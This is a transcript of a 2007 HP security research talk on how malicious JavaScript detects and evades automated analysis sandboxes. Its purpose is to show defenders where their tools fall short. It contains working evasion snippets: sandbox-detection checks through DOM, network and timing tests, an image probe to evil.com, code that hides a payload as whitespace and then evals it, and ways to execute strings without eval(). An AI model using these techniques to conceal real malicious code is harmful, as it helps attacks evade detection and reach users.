Circumventing Automated JavaScript Analysis Billy Hoffman (billy.hoffman@hp.com) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Transcript Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Circumventing
Automated
JavaScript
Analysis
Billy Hoffman
([email protected])
HP Web Security Research Group
© 2007 Hewlett-Packard Development Company, L.P.
The information contained herein is subject to change without notice
Overview
•
JavaScript is part of attackers toolkit
− All the “vanilla” stuff over
− Packing traditional malware
•
IBM ISS: “In second half 2007 Web attack
obfuscation approached 100%”*
•
Exploit frameworks amplify the problem
− Rapid adoption of new techniques
•
We need tools to analyze this
•
How are we doing and can we win?
* From: IBM Internet Security Systems X-Force® 2008 Mid-Year Trend Statistics
Obfuscation Design Pattern
•
Malicious code is stored
− String literals
− Numeric literals
•
Decode function unpacks literals
into new code
•
Ratio of literals to total code is
huge!
− Normal code: 2%-7%
− Obfuscated code: > 30%
Obfuscation Example
Obfuscation != Malicious
•
Legitimate reasons for obfuscating
− “Protect” client-side code
− Reducing download size
•
Common packers
− JSMin
− Dean Edwards packer
− Yahoo’s
•
Result: Its tough to know what to analyze
Original Approach to JS Analysis
•
The Lazy Method
− Replace dangerous calls with alert()
− Run in a browser
•
The Tom Liston Method
− Wrap writes in <TEXTAREA>’s
− Run in a browser
•
The Perl-Fu Method
− Port malware to in Perl
•
The Monkey Wrench Method
− Run it in Spider Monkey
Tricks to Defeating Analysis
•
Deliberate sandbox breaks
− </TEXTAREA>
•
Integrity Checks
− Arguments.callee.toString()
• arguments.callee.toString().replace(/\W/g,"").toUpperCase();
− Gives source code of function body
• Length checks
• Use function body as key
VBScript Wrapper
•
Still in use!
− Older DHTML web apps
− Plug-in enumeration (IE8)
− Malware
JavaScript
•
No open source VBScript
parsers
VBScript
•
No public standard grammar
•
Not very wide-spread
JavaScript
Preventing Sample Collection
•
Can’t reverse what you don’t have!
•
Track IPs
− Geolocation
− Blacklist security firms
•
Serve once per IP
•
User-agent sniffing
•
document.referrer tricks
For those playing at home
Approach
Difficulties
All Approaches
Sampling Prevention
The Lazy Method
Integrity checks
Running hostile code in browser
The Tom Liston Method
Integrity checks
</TEXTAREA> escapes
Running hostile code in browser
Perl Fu
Way too time consuming
Translating JavaScript constructs
The Monkey Wrench Approach
Does pretty well
Approach Today
•
Combination of automatic and manual
•
Interpreters and debuggers (aka sandboxes)
− Rhino
− NJS
− DecryptJS
− SpiderMonkey
•
Trap/monitor certain events
− DOM calls
− eval()s, etc
Its More Complex Than That
•
JS interpreter/debugger
less than ½ the battle
•
JavaScript != DOM
− Host objects
− Events/Timers
− HTTP requests
− Error handling
•
DOM >= HTML
− HTTP headers/cookies
− Browser environment
− Plug-ins
Fundamental Issue
Current JavaScript sandboxes fail to
fully/properly emulate browser
environment. These discrepancies are
detectable by the JavaScript running
inside the sandbox.
Fundamental Issue
.
!=
Detecting JavaScript Sandboxes
•
4 big areas
− DOM Testing
− Network Testing
− Execution Environment Testing
− Plug-in Testing
•
Use test results
− Decrypt next layer
− Handshake to serve next layer
DOM Testing
•
Using the DOM values
•
Detecting presence/lack of
•
Get and sets on values
•
Interacting with HTML elements
DOM Testing: Basic
•
Sandbox Specific Functions
− gc()
− clone()
− trap()
− untrap()
− readline()
•
Malware forces SpiderMonkey to die
− try {quit();} catch (e) { }; //more code here
Detecting Sandbox Specific Functions
if(typeof(gc)==“function”) {… } else {…}
Function Clobbering
•
JavaScript is highly dynamic
• Can redefine functions at runtime!
1
Redefining print() as quit()
Redefining quit()To Nothing
Intertwined DOM Properties
•
Various aliases in the DOM
− document.location == window.location ==
document.URL
− window == window.window == window.self ==
window.parent
• == window.self.self.self.self...
− Any global variable attaches to window
• var spi = 5; window.spi == spi; //true
•
Set a value on one alias
•
Read on another alias
•
Different values means sandbox
document.retarded
•
Mosaic Netscape 0.9beta (1994)
•
Set using HTTP headers
− Set-Cookie:
− Cookie:
•
Get/Set using JavaScript
− document.cookie
document.retarded
•
Mosaic Netscape 0.9beta (1994)
•
Set using HTTP headers
− Set-Cookie:
− Cookie:
•
Get/Set using JavaScript
− document.cookie
•
Set using HTML
−<META> tag
Meta Tag
•
Supply meta data about HTML document
•
http-equiv attribute
− Allows document to specify HTTP headers
− Content overriding an application protocol
HTTP-EQUIV to the rescue
•
Setting cookies with HTML
<html>
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook2=Value 2">
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
Hello Proprietary Extension!
•
Setting cookies with HTML
<html>
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook2=Value 2; HttpOnly">
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
More Meta Tag Fun
•
Hide Script in non-scriptable attribute
<html>
<title>Safe</title>
<meta http-equiv="refresh"
content="0;url=javascript:alert(‘EVIL’)“>
<h1>All safe. Trust me!</h1>
</html>
HTTP Refresh Header
•
Completely remove JS from response body!
HTTP/1.1 200 OK
Refresh: 0;url=javascript:alert('EVIL!')
Connection: close
Content-Length: 29
<h1>I'm Clean... really.</h1>
Psst!
(IE8 supports the data: URI...
data:text/html and
data:text/javascript are
awesome!)
Network Testing
•
Sandbox use dummy network objects
− Good “Are you a browser?” test
•
Use information about response
− DNS successful?
− Last Modified?
− Image Dimensions?
− Valid Response?
•
Forces Sandbox to send network traffic
− Web bugs for hackers?
Network Testing – DNS Lookups
<script>
var count =0;
function loaded(name) {if(name!="bad")count++;}
window.onload = function evil() {
if(count == 1) alert("Browser!");
else alert("Sandbox!");
}
</script>
<iframe src="http://doesnotexist1"
onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://doesnotexist2"
onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://exists/foo.html"
onload="loaded(this.name);" name="good"></iframe>
Network Testing – DNS Lookups
Network Testing - Images
•
Image object provides rich meta data
− Length
− Width
− Image was valid?
•
CSS Images too
var img = new Image();
•
Use this information
img.onload = goodFunc;
− Complex handshaking
− Construct a Key
img.onerror = badFunc;
img.src="http://evil.com/"
Side Note: Image Side Channels
•
JavaScript Image object
•
Height + width = 8 bytes
•
How to send 0xFFFFFFFF without 4GB of pixel
data?
− GIF, PNG, Windows too short
− BMP + RLE? Nope
•
XBM Image Format
#define w 1351
#define h 1689
static char b[]={0};
FF XBM WTF??!!!1111oneoneoneomg
The Dan Kaminski Option
Network Testing - Ajax
•
Ajax can see HTTP response headers
− Complex handshaking
− Construct a key
var xhr = new XmlHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState==4 && xhr.status=200)
{
if(xhr.getResponseHeader("Secr3t") == "key") {
//do evil
}
}
}
Execution Environment Testing
•
Sandbox execute code differently
− Trap function calls
− Step/break on code
− Manipulate data
•
Can tell these differences
− Timing information
− Event Order
− Error Handling
Timing Information
•
Use JavaScript’s Date object
− Millisecond resolution times
•
Can detect paused execution
<script>
var start = (new Date()).getTime();
document.writeln(String.fromCharCode(66,77,72));
</script>
<script>
var diff= (new Date()).getTime() - start;
if(diff < 3) document.writeln("Browser");
else document.writeln("Sandbox");
</script>
Detecting Steps/Breaks with Timers
•
Timers are a pain!
− Can’t really wait 5 seconds
− Ordering
− Clearing
•
Can detect paused execution
•
Start a Timer
Count++
Count++
…
− Perform some math operation
•
After fixed interval
− Sample the value
Count++
Detecting Steps/Breaks with Timers
var count = 0;
setInterval("count++;", 10);
setTimeout(checkSum, 1000);
function checkSum() {
//allow for skew
if(count >= 950 && count <=1000) {
alert("Browser");
} else {
alert("Sandbox");
}
}
Event Order
Sandboxs don’t run events in the proper order
• XmlHttpRequest’s onreadystatechange() fires 4
times
•
onclick() >> onclick() >> ondbclick()
• onkeydown() >> onkeyup() >> onkeypress()
•
onmousedown() >> onmouseup() >> onclick()
• onmouseover() >> onmousemove()
• onclick() >> onfocus() (for inputs)
•
onfocus() >> onblur()
• onload() >> onunload()
•
Advanced Event Order
•
Dependant’s onload before
window.onload
− iFrames
− Images
•
Event propagation
− DOM events must bubble
− Continue based on return value of
event
•
Events that never fire
− Invisible with CSS
onclick
WINDOW
onclick
BODY
DIV
DIV
INPUT
onclick
Error Handling
•
window.onerror handles uncaught exceptions
•
Induce syntax errors
•
Recover in handler
<script>
window.onerror = function() {
//evil code
}
</script>
<script>
Lolz &nd B00m$; //Syntax Error
</script>
Error Handling
•
window.onerror handles uncaught exceptions
•
Induce runtime errors
•
Harder to handle/debug
window.onerror = function() {
//evil code
}
function boom() {
return ‘so long!’ & boom();
}
boom(); // error too much recursion
Advanced Error Handling
•
Detailed info passed to
window.onerror
− Message
− File
− Line Number
•
Can be to
− Fingerprint web browser
− Verify domain/location
− Construct a decryption key
Plug-in Testing
•
Not just navigator.plug-ins checks
•
Timing is a cool test
− Did I really invoke that ActiveX object?
•
Sizing is a cool test
− Is that Applet really 400 x 300?
•
Cross Communication
− Really sexy!
− Apply previous methods inside plug-in
• Error handling, Eventing, etc
JavaScript -> Flash -> JavaScript
•
Multiple ways
− getURL();
− Flash LSO
•
Additional capabilities
− Richer HTTP requests
− More File formats
•
JavaScript
Excellent browser support
Flash
JavaScript
JavaScript -> Java -> JavaScript
•
•
•
•
Lots of fun object casting
− JSObject -> double -> JSObject
JavaScript
Java has more capabilities than JS
− High resolution timers
− Sockets
Java
− Internal IP
Assault the researcher!
− Signed Applets can access the file
system!
JavaScript
LiveConnect
− var myAddress =
java.net.InetAddress.getLocalHost();
Preventing Sample Gathering
•
Browser Identification for Web Applications
(Shreeraj Shah 2004)
•
HTTP headers
− Ordering and Values
− Redirects, form posts, content types, cookie settings
•
HTTP Caching
− Obeying the directives
• HTTP/1.1 HTTP/1.0 Precedence
− Sending conditional GETs
Crazy Idea #1
•
Obfuscated Code is
obviously interesting
− But not always malicious
•
“Safe” looking code might not
be interesting
•
Can I create code that
doesn’t look malicious?
Dehydrating a String
•
Converts any string into whitespace
•
7 bit per character
− 1 = space
− 0 = tab
•
\n means we are done
•
‘a’ = 1100001
•
Dehydrate('a') = space, space, tab, tab, tab,
tab, space
Dehydrate Function
function dehydrate(s) {
var r = new Array();
for(var i=0; i < s.length; i++) {
for(var j=6; j >=0; j—) {
if(s.charCodeAt(i) & (Math.pow(2,j))) {
r.push(' ');
} else {
r.push('\t');
}
}
}
r.push('\n');
return r.join('');
}
Hydrate Function
function hydrate(s) {
var r = new Array();
var curr = 0;
while(s.charAt(curr) != '\n') {
var tmp = 0;
for(var i=6; i>=0; i—) {
if(s.charAt(curr) == ' ') {
tmp = tmp | (Math.pow(2,i));
}
curr++;
}
r.push(String.fromCharCode(tmp));
}
return r.join('');
}
Invisible Malicious Code!
//st4rt
//3nd
var html = document.body.innerHTML;
var start = html.indexOf("//st" + "4rt");
var end = html.indexOf("3" + "nd");
var code = html.substring(start+12, end);
eval(hydrate(code));
Crazy Idea #2
•
Who cares how its encoded?
•
Eventually they have to
execute the string of code
•
CaffeineMonkey et al are just
hooking eval()
•
Can I execute malicious code
stored in a string without
eval()?
Eval() The Interpreter has a Posse…
var evilCode = "alert('evil');";
window.location.replace("javascript:" + evilCode);
document.location.replace("javascript:" + evilCode);
setTimeout(evilCode, 10);
setInterval(evilCode, 500);
new Function(evilCode)();
//IE only
window.execScript(evilCode);
60
Fixing All of This
•
Advice for tool developers
− Remove discrepancies between sandbox and browser
• DOM/HTTP/DNS/Network/Eventing
− Everything should be interesting
− The sandbox needs a sandbox; you will be attacked.
•
Advice for others
− Microsoft
• Publish a Grammar for VBScript
• Disable completely based on DOCTYPE
− Adobe: Release an controllable Flash VM
Shoulders of Giants
•
Jose Nazario
•
Ben Feinstein
•
Internet Storm Center guys
•
Stephan Chenette, et al. @ WebSense
•
Shreeraj Shah
•
Rob Freeman
•
Aviv Raff
Questions?
[email protected]
Circumventing
Automated
JavaScript
Analysis
Billy Hoffman
([email protected])
HP Web Security Research Group
© 2007 Hewlett-Packard Development Company, L.P.
The information contained herein is subject to change without notice

Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Transcript Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Directory